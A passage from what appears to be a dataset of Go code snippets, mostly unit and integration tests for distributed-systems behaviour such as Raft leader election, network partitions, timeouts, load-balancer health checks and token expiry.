newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func testWithTimeout(timeout time.Duration, run func() error) error {\n\ttimer := time.NewTimer(timeout)\n\tdefer timer.Stop()\n\n\tfor {\n\t\tif err := run(); err != nil {\n\t\t\tselect {\n\t\t\tcase <-timer.C:\n\t\t\t\treturn err\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(time.Millisecond * 5)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n}", "func testCandidateResetTerm(t *testing.T, mt pb.MessageType) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\n\tnt := newNetwork(a, b, c)\n\tdefer nt.closeAll()\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// isolate 3 and increase term in rest\n\tnt.isolate(3)\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tif a.state != StateLeader {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateLeader)\n\t}\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\t// trigger campaign in isolated c\n\tc.resetRandomizedElectionTimeout()\n\tfor i := 0; i < c.randomizedElectionTimeout; i++ {\n\t\tc.tick()\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tnt.recover()\n\n\t// leader sends to isolated candidate\n\t// and expects candidate to revert to follower\n\tnt.send(pb.Message{From: 1, To: 3, Term: a.Term, Type: mt})\n\n\tif c.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateFollower)\n\t}\n\n\t// follower c term is reset with leader's\n\tif a.Term != c.Term {\n\t\tt.Errorf(\"follower term expected same term as leader's %d, got %d\", a.Term, c.Term)\n\t}\n}", "func TestConnectionStateFailedDeleteAllCandidates(t *testing.T) {\n\treport := test.CheckRoutines(t)\n\tdefer report()\n\n\tlim := test.TimeOut(time.Second * 5)\n\tdefer lim.Stop()\n\n\toneSecond := time.Second\n\tKeepaliveInterval := time.Duration(0)\n\n\tcfg := &AgentConfig{\n\t\tNetworkTypes: supportedNetworkTypes(),\n\t\tDisconnectedTimeout: &oneSecond,\n\t\tFailedTimeout: &oneSecond,\n\t\tKeepaliveInterval: &KeepaliveInterval,\n\t}\n\n\taAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tbAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tisFailed := make(chan interface{})\n\tassert.NoError(t, aAgent.OnConnectionStateChange(func(c ConnectionState) {\n\t\tif c == ConnectionStateFailed {\n\t\t\tclose(isFailed)\n\t\t}\n\t}))\n\n\tconnect(aAgent, bAgent)\n\t<-isFailed\n\n\tdone := make(chan struct{})\n\tassert.NoError(t, aAgent.run(context.Background(), func(ctx context.Context, agent *Agent) {\n\t\tassert.Equal(t, len(aAgent.remoteCandidates), 0)\n\t\tassert.Equal(t, len(aAgent.localCandidates), 0)\n\t\tclose(done)\n\t}))\n\t<-done\n\n\tassert.NoError(t, aAgent.Close())\n\tassert.NoError(t, bAgent.Close())\n}", "func TestRandomLBWhenNodeFailBalanced(t *testing.T) {\n\tdefer func() {\n\t\t// clear healthStore\n\t\thealthStore = sync.Map{}\n\t}()\n\n\tpool := makePool(4)\n\tvar hosts []types.Host\n\tvar unhealthyIdx = 2\n\tfor i := 0; i < 4; i++ {\n\t\thost := &mockHost{\n\t\t\taddr: pool.Get(),\n\t\t}\n\t\tif i == unhealthyIdx {\n\t\t\thost.SetHealthFlag(api.FAILED_ACTIVE_HC)\n\t\t}\n\t\thosts = append(hosts, host)\n\t}\n\n\ths := &hostSet{}\n\ths.setFinalHost(hosts)\n\tlb := newRandomLoadBalancer(nil, hs)\n\ttotal := 1000000\n\trunCase := func(subTotal int) {\n\t\tresults := map[string]int{}\n\t\tfor i := 0; i < subTotal; i++ {\n\t\t\th := lb.ChooseHost(nil)\n\t\t\tv, ok := results[h.AddressString()]\n\t\t\tif !ok {\n\t\t\t\tv = 0\n\t\t\t}\n\t\t\tresults[h.AddressString()] = v + 1\n\t\t}\n\t\tfor i := 0; i < 4; i++ {\n\t\t\taddr := hosts[i].AddressString()\n\t\t\trate := float64(results[addr]) / float64(subTotal)\n\t\t\texpected := 0.33333\n\t\t\tif i == unhealthyIdx {\n\t\t\t\texpected = 0.000\n\t\t\t}\n\t\t\tif math.Abs(rate-expected) > 0.1 { // no lock, have deviation 10% is acceptable\n\t\t\t\tt.Errorf(\"%s request rate is %f, expected %f\", addr, rate, expected)\n\t\t\t}\n\t\t\tt.Logf(\"%s request rate is %f, request count: %d\", addr, rate, results[addr])\n\t\t}\n\t}\n\t// simple test\n\trunCase(total)\n\t// concurr\n\twg := sync.WaitGroup{}\n\tsubTotal := total / 10\n\tfor i := 0; i < 10; i++ {\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\trunCase(subTotal)\n\t\t\twg.Done()\n\t\t}()\n\t}\n\twg.Wait()\n}", "func testTimeoutReplacement(ctx context.Context, t *testing.T, w *Wallet) {\n\ttimeChan1 := make(chan time.Time)\n\ttimeChan2 := make(chan time.Time)\n\terr := w.Unlock(ctx, testPrivPass, timeChan1)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\terr = w.Unlock(ctx, testPrivPass, timeChan2)\n\tif err != nil {\n\t\tt.Fatal(\"failed to unlock wallet\")\n\t}\n\ttimeChan2 <- time.Time{}\n\ttime.Sleep(100 * time.Millisecond) // Allow time for lock in background\n\tif !w.Locked() {\n\t\tt.Fatal(\"wallet did not lock using replacement timeout\")\n\t}\n\tselect {\n\tcase timeChan1 <- time.Time{}:\n\tdefault:\n\t\tt.Fatal(\"previous timeout was not read in background\")\n\t}\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func Timeout(t cbtest.T, after time.Duration, fn func()) {\n\tt.Helper()\n\n\tdone := make(chan struct{})\n\n\tgo func() {\n\t\tfn()\n\t\tdone <- struct{}{}\n\t}()\n\n\tselect {\n\tcase <-time.After(after):\n\t\tt.Error(\"Operation timed out\")\n\tcase <-done:\n\t}\n}", "func (state *ServerState) TimeoutStateTransition() {\n\n\tif state.IsFollower() {\n\t\tstate.curState = CANDIDATE\n\t\tstate.votedFor = -1\n\t\tstate.currentTerm++\n\t} else if state.IsCandidate() {\n\t\t//Candidates who timeout keep being candidates\n\t\tstate.votedFor = -1\n\t\tstate.currentTerm++\n\t} else if state.IsLeader() {\n\t\tfmt.Println(\"WARNING: timedout as a leader\")\n\t\t//Leaders should not timeout\n\t}\n}", "func TestClock_AfterReconnectTimeout(t *testing.T) {\n\tc := raft.NewClock()\n\tc.ReconnectTimeout = 10 * time.Millisecond\n\tt0 := time.Now()\n\t<-c.AfterReconnectTimeout()\n\tif d := time.Since(t0); d < c.ReconnectTimeout {\n\t\tt.Fatalf(\"channel fired too soon: %v\", d)\n\t}\n}", "func TestElectVotersNonDupDeterministic(t *testing.T) {\n\tcandidates1 := newValidatorSet(100, func(i int) int64 { return int64(i + 1) })\n\tcandidates2 := newValidatorSet(100, func(i int) int64 { return int64(i + 1) })\n\tfor i := 1; i <= 100; i++ {\n\t\twinners1 := electVotersNonDup(candidates1.Validators, uint64(i), 24, 0)\n\t\twinners2 := electVotersNonDup(candidates2.Validators, uint64(i), 24, 0)\n\t\tsameVoters(winners1, winners2)\n\t\tresetPoints(candidates1)\n\t\tresetPoints(candidates2)\n\t}\n}", "func properTimeDuration(state int) time.Duration {\n\tif state == LEADER {\n\t\treturn time.Millisecond * HEARTBEAT_INTERVAL\n\t}\n\treturn time.Millisecond * time.Duration(\n\t\tMIN_ELECTION_INTERVAL+rand.Intn(MAX_ELECTION_INTERVAL-MIN_ELECTION_INTERVAL))\n}", "func (c *DNSProvider) Timeout() (timeout, interval time.Duration) {\n\treturn 120 * time.Second, 2 * time.Second\n}", "func (g *groupFailover) Timeout() time.Duration {\n\treturn g.timeout\n}", "func TestNoQuorum(t *testing.T) {\n\tcommitteeMock, keys := agreement.MockCommittee(3, true, 3)\n\teb, roundChan := initAgreement(committeeMock)\n\thash, _ := crypto.RandEntropy(32)\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\teb.Publish(string(topics.Agreement), agreement.MockAgreement(hash, 1, 1, keys))\n\n\tselect {\n\tcase <-roundChan:\n\t\tassert.FailNow(t, \"not supposed to get a round update without reaching quorum\")\n\tcase <-time.After(100 * time.Millisecond):\n\t\t// all good\n\t}\n}", "func TestOnlineElection(t *testing.T) {\n\tvar cases = []struct {\n\t\tpersons []int\n\t\ttimes []int\n\t\tq []int\n\t\ta []int\n\t}{\n\t\t//{\n\t\t//\tpersons: []int{0, 1, 1, 0, 0, 1, 0},\n\t\t//\ttimes: []int{0, 5, 10, 15, 20, 25, 30},\n\t\t//\tq: []int{3, 12, 25, 15, 24, 8},\n\t\t//\ta: []int{0, 1, 1, 0, 0, 1},\n\t\t//},\n\t\t{\n\t\t\tpersons: []int{0, 1, 0, 1, 1},\n\t\t\ttimes: []int{24, 29, 31, 76, 81},\n\t\t\tq: []int{28, 24, 29, 77, 30, 25, 76, 75, 81, 80},\n\t\t\ta: []int{0, 0, 1, 1, 1, 0, 1, 0, 1, 1},\n\t\t},\n\t}\n\tfor _, c := range cases {\n\t\tvote := Constructor(c.persons, c.times)\n\t\tfor i := 0; i < len(c.q); i++ {\n\t\t\tif vote.Q(c.q[i]) != c.a[i] {\n\t\t\t\tt.Fail()\n\t\t\t}\n\t\t}\n\t}\n}", "func TestRaft_SlowRecvVote(t *testing.T) {\n\thooks := NewSlowVoter(\"svr_1\", \"svr_4\", \"svr_3\")\n\thooks.mode = SlowRecv\n\tcluster := newRaftCluster(t, testLogWriter, \"svr\", 5, hooks)\n\ts := newApplySource(\"SlowRecvVote\")\n\tac := cluster.ApplyN(t, time.Minute, s, 10000)\n\tcluster.Stop(t, time.Minute)\n\thooks.Report(t)\n\tcluster.VerifyLog(t, ac)\n\tcluster.VerifyFSM(t)\n}", "func (ck *Clerk) randomChooseLeader() int {\n\tn := len(ck.servers)\n\treturn (ck.leaderId+1) % n\n}", "func TestSignerRemoteRetryTCPOnly(t *testing.T) {\n\tvar (\n\t\tattemptCh = make(chan int)\n\t\tretries = 2\n\t)\n\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:0\")\n\trequire.NoError(t, err)\n\n\tgo func(ln net.Listener, attemptCh chan<- int) {\n\t\tattempts := 0\n\n\t\tfor {\n\t\t\tconn, err := ln.Accept()\n\t\t\trequire.NoError(t, err)\n\n\t\t\terr = conn.Close()\n\t\t\trequire.NoError(t, err)\n\n\t\t\tattempts++\n\n\t\t\tif attempts == retries {\n\t\t\t\tattemptCh <- attempts\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}(ln, attemptCh)\n\n\tserviceEndpoint := NewSignerServiceEndpoint(\n\t\tlog.TestingLogger(),\n\t\tcmn.RandStr(12),\n\t\ttypes.NewMockPV(),\n\t\tDialTCPFn(ln.Addr().String(), testTimeoutReadWrite, ed25519.GenPrivKey()),\n\t)\n\tdefer serviceEndpoint.Stop()\n\n\tSignerServiceEndpointTimeoutReadWrite(time.Millisecond)(serviceEndpoint)\n\tSignerServiceEndpointConnRetries(retries)(serviceEndpoint)\n\n\tassert.Equal(t, serviceEndpoint.Start(), ErrDialRetryMax)\n\n\tselect {\n\tcase attempts := <-attemptCh:\n\t\tassert.Equal(t, retries, attempts)\n\tcase <-time.After(100 * time.Millisecond):\n\t\tt.Error(\"expected remote to observe connection attempts\")\n\t}\n}", "func TestResolveSecretsWithTimeout(t *testing.T) {\n\tsecretResolver, err := NewSecretResolver(MockResolveSecret, time.Duration(0))\n\tif err != nil {\n\t\tt.Errorf(\"Failed to create secret resolver. Err: %v\", err)\n\t}\n\n\tctx := context.Background()\n\tsecrets := []*Secret{\n\t\t{\n\t\t\tID: \"mysecret1\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret2\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret3\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret4\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret5\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret6\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t\t{\n\t\t\tID: \"mysecret7\",\n\t\t\tKeyVault: \"https://myvault.vault.azure.net/secrets/mysecret\",\n\t\t},\n\t}\n\n\tresolveError := secretResolver.ResolveSecrets(ctx, secrets)\n\tif resolveError == nil {\n\t\tt.Fatalf(\"Expected test to error but it didn't\")\n\t}\n}", "func TestCVTimeoutStress(t *testing.T) {\n\tconst loopCount = 50000\n\tconst threadsPerValue = 5\n\tvar s cvStressData\n\n\ts.mu.Lock()\n\ts.mu.AssertHeld()\n\t// Create threads trying to increment from 1, 2, and 3 mod 4.\n\t// They will continually hit their timeouts because s.count==0\n\tfor i := 0; i != threadsPerValue; i++ {\n\t\ts.mu.AssertHeld()\n\t\ts.refs++\n\t\tgo cvStressIncLoop(&s, 1, loopCount)\n\t\ts.refs++\n\t\tgo cvStressIncLoop(&s, 2, loopCount)\n\t\ts.refs++\n\t\tgo cvStressIncLoop(&s, 3, loopCount)\n\t}\n\ts.mu.AssertHeld()\n\ts.mu.Unlock()\n\n\t// Sleep a few seconds to cause many timeouts.\n\tconst sleepSeconds = 3\n\ttime.Sleep(sleepSeconds * time.Second)\n\n\t// Start the clock after the sleep above.\n\tstart := time.Now()\n\n\ts.mu.Lock()\n\ts.mu.AssertHeld()\n\n\t// Check that approximately the right number of timeouts have occurred.\n\t// The 3 below is the three classes of thread produced before the Sleep().\n\t// The factor of 1/4 is to allow for randomness and slow test machines.\n\texpectedTimeouts := uint64(threadsPerValue * 3 * sleepSeconds * cvExpectedTimeoutsPerSec / 4)\n\ttimeoutsSeen := s.timeouts\n\tif timeoutsSeen < expectedTimeouts {\n\t\t// Note, that this can potentially fail if the test is run on a\n\t\t// very loaded machine.\n\t\tt.Errorf(\"expected more than %d timeouts, got %d\", expectedTimeouts, timeoutsSeen)\n\t}\n\n\t// Now create the threads that increment from 0 mod 4. s.count will then be incremented.\n\tfor i := 0; i != threadsPerValue; i++ {\n\t\ts.mu.AssertHeld()\n\t\ts.refs++\n\t\tgo cvStressIncLoop(&s, 0, loopCount)\n\t}\n\n\t// Wait for threads to exit.\n\ts.mu.AssertHeld()\n\tfor s.refs != 0 {\n\t\ts.refsIsZero.Wait(&s.mu)\n\t}\n\ts.mu.AssertHeld()\n\tif s.refs != 0 {\n\t\tt.Fatalf(fmt.Sprintf(\"s.refs == %d; expected 0 at end of TestCVWaitStress\", s.refs))\n\t}\n\n\ts.mu.AssertHeld()\n\ts.mu.Unlock()\n\ttimeTaken := time.Since(start)\n\n\t// Check that s.count has the right value.\n\texpectedCount := uint64(loopCount * threadsPerValue * 4)\n\tif s.count != expectedCount {\n\t\tt.Errorf(\"expected to increment s.count to %d, got %d\", expectedCount, s.count)\n\t}\n\n\t// Some timeouts shoud have happened while the counts were being incremented.\n\texpectedTimeouts = timeoutsSeen + expectedTimeoutsDelta\n\tt.Logf(\"timeouts: %v, expected: %v, delta %v, time taken: %v, seen: %v\", s.timeouts, expectedTimeouts, expectedTimeoutsDelta, timeTaken, timeoutsSeen)\n\tif timeTaken > 4*time.Second {\n\t\t// Looks like a slow test, let's just be content\n\t\t// with a small number of timeouts.\n\t\texpectedTimeouts = 1000\n\t\tt.Logf(\"slow test, adjusting expected timeouts accordingly: %v\", expectedTimeouts)\n\t}\n\tif s.timeouts < expectedTimeouts {\n\t\tt.Errorf(\"expected more than %d timeouts, got %d\", expectedTimeouts, s.timeouts)\n\t}\n\tif s.timeouts == 0 {\n\t\tt.Errorf(\"expected a non-zero number of timeouts\")\n\t}\n}", "func TestTokenTTL(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"Skipping integration tests in short mode\")\n\t}\n\tdeleteAll(t)\n\tadminClient := getPachClient(t, admin)\n\n\t// Create repo (so alice has something to list)\n\trepo := tu.UniqueString(\"TestTokenTTL\")\n\trequire.NoError(t, adminClient.CreateRepo(repo))\n\n\t// Create auth token for alice\n\talice := tu.UniqueString(\"alice\")\n\tresp, err := adminClient.GetAuthToken(adminClient.Ctx(), &auth.GetAuthTokenRequest{\n\t\tSubject: alice,\n\t\tTTL: 5, // seconds\n\t})\n\trequire.NoError(t, err)\n\taliceClient := adminClient.WithCtx(context.Background())\n\taliceClient.SetAuthToken(resp.Token)\n\n\t// alice's token is valid, but expires quickly\n\trepos, err := aliceClient.ListRepo()\n\trequire.NoError(t, err)\n\trequire.ElementsEqualUnderFn(t, []string{repo}, repos, RepoInfoToName)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\trepos, err = aliceClient.ListRepo()\n\t\tif err == nil {\n\t\t\treturn errors.New(\"alice still has access to ListRepo\")\n\t\t}\n\t\trequire.True(t, auth.IsErrBadToken(err), err.Error())\n\t\trequire.Equal(t, 0, len(repos))\n\t\treturn nil\n\t}, backoff.NewTestingBackOff()))\n}", "func TestRandomConsistency(t *testing.T) {\n\tx1 := crypto.CRandBytes(256)\n\tx2 := crypto.CRandBytes(256)\n\tx3 := crypto.CRandBytes(256)\n\tx4 := crypto.CRandBytes(256)\n\tx5 := crypto.CRandBytes(256)\n\trequire.NotEqual(t, x1, x2)\n\trequire.NotEqual(t, x3, x4)\n\trequire.NotEqual(t, x4, x5)\n\trequire.NotEqual(t, x1, x5)\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestAuthRequestTimeoutWithDurationLessThanZero(t *testing.T) {\n\trunTest(t, func(s *res.Service) {\n\t\ts.Handle(\"model\", res.Auth(\"method\", func(r res.AuthRequest) {\n\t\t\tpanicked := true\n\t\t\tdefer func() {\n\t\t\t\tif !panicked {\n\t\t\t\t\tt.Errorf(\"expected Timeout to panic, but nothing happened\")\n\t\t\t\t}\n\t\t\t}()\n\t\t\tr.Timeout(-time.Millisecond * 10)\n\t\t\tr.NotFound()\n\t\t\tpanicked = false\n\t\t}))\n\t}, func(s *restest.Session) {\n\t\ts.Auth(\"test.model\", \"method\", nil).\n\t\t\tResponse().\n\t\t\tAssertErrorCode(\"system.internalError\")\n\t})\n}", "func TestMultipleHeartbeatTimeout(t *testing.T) {\n\ts := NewSupervisor(nil)\n\traa := NewRecoverableAction(s)\n\trab := NewRecoverableAction(s)\n\trac := NewRecoverableAction(s)\n\n\ts.AddRecoverable(\"A\", raa)\n\ts.AddRecoverable(\"B\", rab)\n\ts.AddRecoverable(\"C\", rac)\n\n\tt.Logf(\"(A) is '%v'.\", raa.Action(TimeConsumingAction))\n\tt.Logf(\"(B) is '%v'.\", rab.Action(PositiveAction))\n\tt.Logf(\"(C) is '%v'.\", rac.Action(PositiveAction))\n}", "func randomAccess(r *Yaesu, timeout time.Duration, c *apiCallCounter,\n\twg *sync.WaitGroup, t *testing.T) {\n\tdefer wg.Done()\n\n\ttimeoutTimer := time.NewTimer(timeout)\n\n\tfor {\n\t\trandFunc := rand.Intn(12)\n\n\t\tswitch randFunc {\n\t\tcase 0:\n\t\t\tr.Serialize()\n\t\t\tatomic.AddUint64(&c.serialize, 1)\n\t\tcase 1:\n\t\t\tr.Azimuth()\n\t\t\tatomic.AddUint64(&c.azimuth, 1)\n\t\tcase 2:\n\t\t\tr.Elevation()\n\t\t\tatomic.AddUint64(&c.elevation, 1)\n\t\tcase 3:\n\t\t\tr.AzPreset()\n\t\t\tatomic.AddUint64(&c.azPreset, 1)\n\t\tcase 4:\n\t\t\tr.HasAzimuth()\n\t\t\tatomic.AddUint64(&c.hasAzimuth, 1)\n\t\tcase 5:\n\t\t\tr.HasElevation()\n\t\t\tatomic.AddUint64(&c.hasElevation, 1)\n\t\tcase 6:\n\t\t\tr.ElPreset()\n\t\t\tatomic.AddUint64(&c.elPreset, 1)\n\t\tcase 7:\n\t\t\terr := r.SetAzimuth(rand.Intn(450))\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"unexpected error %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&c.setAzimuth, 1)\n\t\tcase 8:\n\t\t\terr := r.SetElevation(rand.Intn(180))\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"unexpected error %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&c.setElevation, 1)\n\t\tcase 9:\n\t\t\terr := r.Stop()\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"unexpected error %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&c.stop, 1)\n\t\tcase 10:\n\t\t\terr := r.StopElevation()\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"unexpected error %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&c.stopElevation, 1)\n\t\tcase 11:\n\t\t\terr := r.StopAzimuth()\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"unexpected error %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&c.stopAzimuth, 1)\n\t\t}\n\n\t\tselect {\n\t\tcase <-timeoutTimer.C:\n\t\t\treturn\n\t\tdefault:\n\t\t\t//pass\n\t\t}\n\t}\n}", "func (fd *failureDetector) timeout() {\n\tfd.logln(\"timeout\")\n\tfd.m.Lock()\n\tdefer fd.m.Unlock()\n\tif !fd.aliveSuspectedIntersectionEmpty() {\n\t\tfd.delay = fd.delay + fd.delta\n\t\tfd.logf(\"new delay %d\\n\", fd.delay)\n\t\tfd.timeoutSignal = time.NewTicker(fd.delay)\n\t}\n\tfor _, node := range fd.config.Nodes() {\n\t\tif !fd.alive[node] && !fd.suspected[node] {\n\t\t\tfd.suspected[node] = true\n\t\t\tfd.logf(\"suspect %v\\n\", node)\n\t\t\tfd.sr.Suspect(node)\n\t\t} else if fd.alive[node] && fd.suspected[node] {\n\t\t\tdelete(fd.suspected, node)\n\t\t\tfd.logf(\"restore %v\\n\", node)\n\t\t\tfd.sr.Restore(node)\n\t\t}\n\n\t\tfd.hbChan <- node\n\t}\n\tfd.logln(\"fd.alive\", fd.alive)\n\tfd.alive = make(map[*Node]bool)\n}", "func TestLeaderElectionJumpToGreaterView(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for larger view should replace current attempt.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 2)\n\n\t// ViewChange message from node 1 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 6}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(6, 3)\n\tif exp, a := uint64(6), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n}", "func TestFailbackRetryFailed10Times(t *testing.T) {\n\tctrl := gomock.NewController(t)\n\tdefer ctrl.Finish()\n\n\tinvoker := mock.NewMockInvoker(ctrl)\n\tclusterInvoker := registerFailback(invoker).(*failbackClusterInvoker)\n\tclusterInvoker.maxRetries = 10\n\n\tinvoker.EXPECT().IsAvailable().Return(true).AnyTimes()\n\tinvoker.EXPECT().GetURL().Return(failbackUrl).AnyTimes()\n\n\t// 10 task should failed firstly.\n\tmockFailedResult := &protocol.RPCResult{Err: perrors.New(\"error\")}\n\tinvoker.EXPECT().Invoke(gomock.Any(), gomock.Any()).Return(mockFailedResult).Times(10)\n\n\t// 10 task should retry and failed.\n\tvar wg sync.WaitGroup\n\twg.Add(10)\n\tnow := 